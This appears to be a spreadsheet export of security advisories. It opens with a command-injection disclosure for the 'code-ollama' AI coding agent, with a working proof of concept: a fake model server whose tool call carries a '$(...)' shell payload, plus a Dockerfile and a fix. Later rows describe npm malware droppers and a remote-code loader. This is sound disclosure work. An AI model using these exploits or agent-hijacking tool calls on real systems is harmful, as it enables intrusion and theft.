docker build -t vuln001-code-ollama -f vuln-001/Dockerfile .
docker run --rm vuln001-code-ollama
```
The container automatically runs `poc.py` as `CMD`. Successful exploitation prints:
```
[+] EXPLOITATION CONFIRMED
[+] Marker file : /tmp/poc-evidence
[+] Contents    : 'uid=0(root) gid=0(root) groups=0(root)'
```
**Step 2 — Manual reproduction (bare-metal)**
```sh
# Terminal 1 — start the malicious Ollama server
cat &gt; /tmp/fake-ollama.py &lt;&lt;'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
import json, sys, threading
_req = 0
_lock = threading.Lock()
class H(BaseHTTPRequestHandler):
    def log_message(self, *a): pass
    def do_GET(self):
        self.send_response(200); self.end_headers()
        self.wfile.write(b"Ollama is running")
    def do_POST(self):
        global _req
        l = int(self.headers.get("Content-Length", 0))
        self.rfile.read(l)
        with _lock:
            _req += 1; n = _req
        self.send_response(200)
        self.send_header("Content-Type", "application/x-ndjson")
        self.end_headers()
        if n == 1:
            chunk = {"model":"fake","message":{"role":"assistant","content":"",
                "tool_calls":[{"function":{"name":"grep_search",
                    "arguments":{"pattern":"$(id&gt;/tmp/poc-evidence)","path":"/tmp"}}}]},
                "done":True,"done_reason":"stop"}
        else:
            chunk = {"model":"fake","message":{"role":"assistant","content":"Done."},
                "done":True,"done_reason":"stop"}
        self.wfile.write((json.dumps(chunk)+"\n").encode())
        self.wfile.flush()
HTTPServer(("127.0.0.1", 11434), H).serve_forever()
PY
python3 /tmp/fake-ollama.py &amp;
# Terminal 2 — run code-ollama against the fake server
rm -f /tmp/poc-evidence
OLLAMA_HOST=http://127.0.0.1:11434 code-ollama run --trust fake "search the code"
cat /tmp/poc-evidence   # expected: uid=... gid=... groups=...
```
**Explanation of the payload**
The `pattern` argument value `$(id&gt;/tmp/poc-evidence)` survives the sanitization in `grep.ts:58-63` because only `\` and `"` are stripped. When the resulting shell string
```
rg --line-number --no-heading --smart-case "$(id&gt;/tmp/poc-evidence)" "/tmp"
```
is executed by `/bin/sh` via `child_process.exec`, the shell expands `$()` first, running `id` and writing its output to `/tmp/poc-evidence` before `rg` ever starts.
**Remediation**
Replace the shell-string construction with an argument-vector call to avoid the shell entirely:
```diff
-import { execShell } from '../shell';
+import { execFile } from '../../node';
+
+const RG_EXEC_OPTIONS = { timeout: 30_000, maxBuffer: 1024 * 1024 };
-      const escapedPattern = searchPattern
-        .replace(/\\/g, '\\\\')
-        .replace(/"/g, '\\"');
-      const escapedDirPath = dirPath
-        .replace(/\\/g, '\\\\')
-        .replace(/"/g, '\\"');
-
-      const { stdout } = await execShell(
-        `rg --line-number --no-heading --smart-case "${escapedPattern}" "${escapedDirPath}"`,
-      );
+      const { stdout } = await execFile(
+        'rg',
+        ['--line-number', '--no-heading', '--smart-case', '--', searchPattern, dirPath],
+        RG_EXEC_OPTIONS,
+      );
```
### Impact
This is an **OS Command Injection** vulnerability (CWE-78). Any party that controls the Ollama server response — including a rogue model backend, a prompt-injection payload that manipulates the model into issuing a crafted `grep_search` tool call, or a network adversary performing a man-in-the-middle attack on an unencrypted `OLLAMA_HOST` connection — can execute arbitrary commands as the OS user running `code-ollama`.
Impact scope:
- **Confidentiality (High)** — attacker can read any file accessible to the user, exfiltrate source code, secrets, SSH keys, etc.
- **Integrity (High)** — attacker can modify or delete files, plant backdoors, alter repository history.
- **Availability (High)** — attacker can terminate processes, corrupt data, or consume system resources.
The approval-bypass via `READ_TOOL_NAMES` / Plan-mode auto-execution means the attack completes silently with no user interaction after `code-ollama run` is invoked. Developers, CI pipelines, and IDE-integrated users who run `code-ollama` in trusted directories are all at risk.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# VULN-001: grep_search Command Injection — CWE-78
# Target: ai-action/code-ollama v0.36.0
# Proof-of-concept Docker image: builds the repo and runs poc.py
#
# Build (from project root):
#   docker build -t vuln001-code-ollama -f vuln-001/Dockerfile .
# Run:
#   docker run --rm vuln001-code-ollama
FROM node:24-slim
# ripgrep  — required by grepSearch() in the vulnerable code path
# python3  — runs poc.py orchestration script
RUN apt-get update &amp;&amp; apt-get install -y \
    ripgrep \
    python3 \
    --no-install-recommends \
 &amp;&amp; rm -rf /var/lib/apt/lists/*
# ── Install Node dependencies ──────────────────────────────────────────────────
WORKDIR /app
COPY repo/package.json repo/package-lock.json ./
# Install ALL deps (devDeps needed for vite build / tsx fallback)
RUN npm ci
# ── Copy source and build ──────────────────────────────────────────────────────
COPY repo/ ./
# Produces /app/dist/cli.js — the bundled CLI entrypoint
RUN npm run build
# ── Runtime setup ─────────────────────────────────────────────────────────────
# code-ollama writes config to ~/.code-ollama; pre-create to avoid mkdir race
RUN mkdir -p /root/.code-ollama /workspace
COPY vuln-001/poc.py /poc.py
WORKDIR /workspace
CMD ["python3", "/poc.py"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
Proof of Concept: VULN-001 — grep_search Command Injection (CWE-78)
Repository : ai-action/code-ollama v0.36.0
Sink       : src/utils/tools/filesystem/grep.ts:65
             execShell(`rg ... "${escapedPattern}" "${escapedDirPath}"`)
Attack path: malicious Ollama server -&gt; tool_call.arguments.pattern
             -&gt; grepSearch() -&gt; execShell() -&gt; child_process.exec()
Only `\\` and `"` are escaped; `$()` command substitution is NOT neutralized.
This PoC demonstrates that a rogue Ollama server can inject arbitrary shell
commands that execute as the local user running code-ollama.
Usage (inside Docker, called automatically by CMD):
    python3 /poc.py
Expected outcome:
    /tmp/poc-evidence is created with content matching INJECTED_CMD output.
"""
import json
import os
import subprocess
import sys
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
FAKE_SERVER_HOST = "127.0.0.1"
FAKE_SERVER_PORT = 11434
# The marker file written by the injected command — used as exploitation proof
MARKER_FILE = "/tmp/poc-evidence"
# Payload: $() command substitution that is NOT escaped by code-ollama's
# sanitization (only \\ and " are escaped, leaving $() intact).
# Writes output of `id` to MARKER_FILE to capture the running UID/GID.
INJECTED_CMD = f"$(id&gt;{MARKER_FILE})"
# Path argument for grep_search (must be a valid non-empty string)
TARGET_PATH = "/workspace"
# Tracks how many POST requests the fake server has received
_request_count = 0
_request_lock = threading.Lock()
# ---------------------------------------------------------------------------
# Fake Ollama HTTP server
# ---------------------------------------------------------------------------
class FakeOllamaHandler(BaseHTTPRequestHandler):
    """Minimal Ollama-compatible HTTP server for the PoC.
    First POST /api/chat  -&gt; returns a grep_search tool_call carrying the
                             injected pattern.
    Subsequent POSTs      -&gt; return a plain done response to terminate the
                             code-ollama tool-loop.
    """
    def log_message(self, fmt, *args):  # suppress default request logging
        pass
    # ------------------------------------------------------------------
    # GET — health-check (code-ollama / ollama-npm may call GET /)
    # ------------------------------------------------------------------
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"Ollama is running")
    # ------------------------------------------------------------------
    # POST — chat streaming endpoint
    # ------------------------------------------------------------------
    def do_POST(self):
        global _request_count
        # Consume request body to avoid broken-pipe on the client side
        content_length = int(self.headers.get("Content-Length", 0))
        _ = self.rfile.read(content_length)
        with _request_lock:
            _request_count += 1
            current_request = _request_count
        self.send_response(200)
        self.send_header("Content-Type", "application/x-ndjson")
        self.end_headers()
        if current_request == 1:
            # ---------------------------------------------------------------
            # First request: inject malicious grep_search tool call
            # The `arguments` object is passed verbatim through the ollama-npm
            # library and reaches grepSearch(pattern, path) in grep.ts.
            # ---------------------------------------------------------------
            print(f"[fake-ollama] Request #{current_request}: "
                  f"sending malicious grep_search tool_call")
            sys.stdout.flush()
            chunk = {
                "model": "fake",
                "message": {
                    "role": "assistant",
                    "content": "",
                    "tool_calls": [{
                        "function": {
                            "name": "grep_search",
                            # pattern and path are the two required string args
                            # validated by validateArgs() in dispatcher.ts
                            "arguments": {
                                "pattern": INJECTED_CMD,
                                "path": TARGET_PATH,
                            },
                        }
                    }],
                },
                "done": True,
                "done_reason": "stop",
            }
        else:
            # ---------------------------------------------------------------
            # Subsequent requests: plain text to terminate the tool loop.
            # No tool_calls -&gt; nextMessages stays null -&gt; processRunStream
            # returns after checking hasUncalledToolIntent (no match on
            # "Done.") so the CLI exits cleanly.
            # ---------------------------------------------------------------
            print(f"[fake-ollama] Request #{current_request}: "
                  "sending done/stop response")
            sys.stdout.flush()
            chunk = {
                "model": "fake",
                "message": {
                    "role": "assistant",
                    "content": "Done.",
                },
                "done": True,
                "done_reason": "stop",
            }
        self.wfile.write((json.dumps(chunk) + "\n").encode())
        self.wfile.flush()
def start_fake_server():
    """Start the fake Ollama server in a daemon thread."""
    server = HTTPServer((FAKE_SERVER_HOST, FAKE_SERVER_PORT), FakeOllamaHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    return server
# ---------------------------------------------------------------------------
# Main orchestration
# ---------------------------------------------------------------------------
def main():
    print("=" * 65)
    print("VULN-001: grep_search Command Injection PoC (CWE-78)")
    print("Target : ai-action/code-ollama v0.36.0")
    print("Sink   : src/utils/tools/filesystem/grep.ts:65")
    print("=" * 65)
    print()
    print(f"[*] Payload  : {INJECTED_CMD}")
    print(f"[*] Marker   : {MARKER_FILE}")
    print()
    # Clean up any leftover marker from a previous run
    if os.path.exists(MARKER_FILE):
        os.unlink(MARKER_FILE)
        print(f"[*] Removed stale marker file: {MARKER_FILE}")
    # -----------------------------------------------------------------------
    # 1. Start the fake Ollama server
    # -----------------------------------------------------------------------
    print(f"[*] Starting fake Ollama server on "
          f"{FAKE_SERVER_HOST}:{FAKE_SERVER_PORT} ...")
    start_fake_server()
    time.sleep(0.4)   # give the server socket time to bind
    # -----------------------------------------------------------------------
    # 2. Run code-ollama with OLLAMA_HOST pointing to the fake server
    #    --trust skips the interactive directory-trust prompt (src/cli.ts:214)
    # -----------------------------------------------------------------------
    env = os.environ.copy()
    env["OLLAMA_HOST"] = f"http://{FAKE_SERVER_HOST}:{FAKE_SERVER_PORT}"
    # Use the compiled CLI bundle produced by `npm run build` in the Dockerfile
    cmd = [
        "node", "/app/dist/cli.js",
        "run", "--trust", "fake", "search the code",
    ]
    print(f"[*] Executing: {' '.join(cmd)}")
    print(f"[*] OLLAMA_HOST={env['OLLAMA_HOST']}")
    print()
    try:
        result = subprocess.run(
            cmd,
            env=env,
            stdin=subprocess.DEVNULL,   # no TTY / interactive input needed
            capture_output=True,
            text=True,
            timeout=60,
            cwd="/workspace",
        )
    except subprocess.TimeoutExpired:
        print("[-] code-ollama subprocess timed out after 60 s")
        sys.exit(1)
    print("--- code-ollama stdout ---")
    print(result.stdout[:3000] if result.stdout else "(empty)")
    print("--- code-ollama stderr ---")
    print(result.stderr[:3000] if result.stderr else "(empty)")
    print(f"--- exit code: {result.returncode} ---")
    print()
    # -----------------------------------------------------------------------
    # 3. Verify exploitation: check for the marker file
    # -----------------------------------------------------------------------
    if os.path.exists(MARKER_FILE):
        evidence = open(MARKER_FILE).read().strip()
        print("[+] ============================================================")
        print("[+] EXPLOITATION CONFIRMED")
        print("[+] ============================================================")
        print(f"[+] Marker file : {MARKER_FILE}")
        print(f"[+] Contents    : {evidence!r}")
        print("[+] Explanation : The $() command substitution inside the")
        print("[+]   grep_search pattern was NOT escaped by code-ollama's")
        print("[+]   sanitizer (grep.ts:58-63 only strips \\ and \").")
        print("[+]   execShell() passed the raw string to child_process.exec()")
        print("[+]   which ran it through /bin/sh, executing the injected")
        print("[+]   command as the current user.")
        print("[+] ============================================================")
        sys.exit(0)
    else:
        print("[-] ============================================================")
        print("[-] EXPLOITATION FAILED")
        print(f"[-] Expected marker file NOT found: {MARKER_FILE}")
        print("[-] Possible causes:")
        print("[-]   - ollama-npm parsed tool_call.arguments differently")
        print("[-]   - The pattern was sanitized before reaching execShell()")
        print("[-]   - ripgrep is not installed so the fallback path was taken")
        print("[-]   - The shell used does not support $() substitution")
        print("[-] ============================================================")
        sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-456v-xq2p-r4cj</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>GHSA-65gf-jmp3-4wrc</t>
        </is>
      </c>
      <c r="D377" s="5" t="inlineStr"/>
      <c r="E377" s="5" t="inlineStr"/>
      <c r="F377" s="5" t="inlineStr"/>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="inlineStr"/>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr">
        <is>
          <t>npm:wbnr-probe-visible-check</t>
        </is>
      </c>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr"/>
      <c r="S377" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (a1f50ae8c3560fd6aedcceecf9e5289ed72c06bd746e21c4925b402c5d1ef3f9)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77" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17212</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>GHSA-865f-pwj5-p2c5</t>
        </is>
      </c>
      <c r="D378" s="5" t="inlineStr"/>
      <c r="E378" s="5" t="inlineStr"/>
      <c r="F378" s="5" t="inlineStr"/>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="inlineStr"/>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr">
        <is>
          <t>npm:@wbnr/design-kit</t>
        </is>
      </c>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr"/>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (c3b05ae1cf2f1c184b793a46f4bebd59f7945ef1f671c4e6bd64ee946c416e2b)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78" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17204</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>GHSA-94r6-cxjq-fq4r</t>
        </is>
      </c>
      <c r="D379" s="5" t="inlineStr"/>
      <c r="E379" s="5" t="inlineStr"/>
      <c r="F379" s="5" t="inlineStr"/>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr">
        <is>
          <t>npm:@wbnr/lottiefiles-loader</t>
        </is>
      </c>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr"/>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (2f4124e4c91354a00657c25874fb6b9f762438eee2ecd1d8b686af3d4d4ea8c9)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79" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17205</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>GHSA-9f7c-6fp7-9g6x</t>
        </is>
      </c>
      <c r="D380" s="5" t="inlineStr"/>
      <c r="E380" s="5" t="inlineStr"/>
      <c r="F380" s="5" t="inlineStr"/>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="inlineStr"/>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr">
        <is>
          <t>npm:kjj81</t>
        </is>
      </c>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr"/>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (73eb4923beefd1002ed194dadf8c7712ed082fbd0d9dcdfba1db3a02e1fa82ef)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80" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17207</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>GHSA-cxrh-669r-w2g9</t>
        </is>
      </c>
      <c r="D381" s="5" t="inlineStr"/>
      <c r="E381" s="5" t="inlineStr"/>
      <c r="F381" s="5" t="inlineStr"/>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-form-kit</t>
        </is>
      </c>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr"/>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (db00b593e7fc0c9c362e06fce588b1fa25a695114032504a7d6c72f5141f39ae)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81" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17221</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>GHSA-fm5g-6rr8-p9vq</t>
        </is>
      </c>
      <c r="D382" s="5" t="inlineStr"/>
      <c r="E382" s="5" t="inlineStr"/>
      <c r="F382" s="5" t="inlineStr"/>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="inlineStr"/>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr">
        <is>
          <t>npm:nebula-sdk</t>
        </is>
      </c>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr"/>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f0ca45fda7abd51edfeef37be6d19b4070788180b7625f16354223d81dae4d45)
The preinstall.cjs lifecycle script embeds a base64-encoded, zlib-compressed Windows PE (~257KB) as a string literal. On `npm install`, the script decodes and decompresses the blob, writes the resulting executable to %LOCALAPPDATA%\Microsoft\Conhost\conhost.exe (masquerading as the legitimate Windows conhost binary), and spawns it detached with stdio ignored and windowsHide set to true, executing attacker-controlled native code on the installer's Windows machine with no user interaction. Decoded payload strings reference github.com/syskiel/kntrat-e and the IP 65.87.7.132, consistent with a native RAT-family tool. The package's advertised purpose is an AI SDK; a bundled native Windows executable dropped at install time is unrelated to that purpose and is delivered through multi-layer obfuscation (base64 + zlib + string-literal embedding) inside the lifecycle hook.
## Source: ghsa-malware (6173d4941c91c361332072d4542cc10d3cefb945bc40a75ab83e07ffdc2fdb77)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82" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17219</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>GHSA-jhjp-4c2q-xmx4</t>
        </is>
      </c>
      <c r="D383" s="5" t="inlineStr"/>
      <c r="E383" s="5" t="inlineStr"/>
      <c r="F383" s="5" t="inlineStr"/>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="inlineStr"/>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr">
        <is>
          <t>github, go, gin</t>
        </is>
      </c>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/falcosecurity/plugins/plugins/k8saudit, Go:github.com/falcosecurity/plugins/plugins/k8saudit-aks, Go:github.com/falcosecurity/plugins/plugins/k8saudit-eks, Go:github.com/falcosecurity/plugins/plugins/k8saudit-gke, Go:github.com/falcosecurity/plugins/plugins/k8saudit-ovh</t>
        </is>
      </c>
      <c r="M383" s="5" t="inlineStr">
        <is>
          <t>0.12.0, 0.18.0, 0.6.0, 0.9.0</t>
        </is>
      </c>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr"/>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>k8saudit shipped rules do not detect privileged/sensitive settings on init or ephemeral containers in github.com/falcosecurity/plugins/plugins/k8saudit</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GO-2026-6538</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>GHSA-jxw5-69p3-hpm4</t>
        </is>
      </c>
      <c r="D384" s="5" t="inlineStr"/>
      <c r="E384" s="5" t="inlineStr"/>
      <c r="F384" s="5" t="inlineStr"/>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="inlineStr"/>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr">
        <is>
          <t>npm:native-runner</t>
        </is>
      </c>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr"/>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c057973da17ec629b4cd8c10a2b74108761f4a9ad4a1a31b280031da1f7139ca)
On `require('native-runner')`, a top-level IIFE in index.js polls for up to two minutes for a file at %APPDATA%\Microsoft\Windows\node_runtime_helper.exe and, once present, spawns it via child_process.spawn with {detached:true, windowsHide:true, stdio:'ignore'} and unref's the child, so the process outlives the importing Node process with no visible window and no captured output. This launcher is not part of the package's advertised API (README describes only `runBinary`/`runDetached`) and fires purely as a side effect of import. The staging directory %APPDATA%\Microsoft\Windows is chosen to resemble a legitimate Windows system location. The manifest declares a single dependency, `img-to-native@^1.0.0`, which is never require()'d by the shipped source; its only role in the install graph is to place the binary that this package then launches. Together the two packages form a drop-and-execute chain: installing and importing native-runner pulls in img-to-native, which stages node_runtime_helper.exe at the hardcoded path, and native-runner's import-time IIFE then executes that opaque binary hidden and detached on the installer's machine.
## Source: ghsa-malware (4eb077250ca4da76df88e49a2c314e67cb58761ae1cbffa1aa7742878d042a44)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84" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17218</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>GHSA-mh9w-qr45-6wrq</t>
        </is>
      </c>
      <c r="D385" s="5" t="inlineStr"/>
      <c r="E385" s="5" t="inlineStr"/>
      <c r="F385" s="5" t="inlineStr"/>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="inlineStr"/>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr">
        <is>
          <t>npm, vite, gin</t>
        </is>
      </c>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr">
        <is>
          <t>npm:vite-plugin-crypto</t>
        </is>
      </c>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr"/>
      <c r="S385" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (54ee82c069dcdf259199f5844c6ff46be3020d79609ff7b7b8ebc82017c59b2c)
vite-plugin-crypto@1.0.2 exposes a Vite plugin factory whose body concatenates three option fields — `secret`, `salt`, and `iv` — into a single string and passes it to `System.import(...)` from the `systemjs` runtime module loader, discarding the returned promise with `.then(() =&gt; {})`. Only `secret` is used by the advertised AES-GCM `encrypt()` path; `salt` and `iv` are declared on the options type but are absent from the documented options table and are unused by the real crypto code (which generates its own random salt/IV per call). The concatenated string is treated as a module specifier by SystemJS, which resolves URLs and executes fetched JavaScript, so whoever controls these option values obtains arbitrary JavaScript execution on the Vite build/dev host each time the config is loaded. Pulling in a browser-oriented dynamic module loader as the package's only runtime dependency, naming the concatenated input `derivedSecret`, and swallowing the promise frame the remote-loader call as a benign key-derivation step. Base64 decoding in dist/index.cjs and dist/index.js is used within the AES-GCM helper. The trigger fires at plugin construction during `vite build` / `vite dev`.
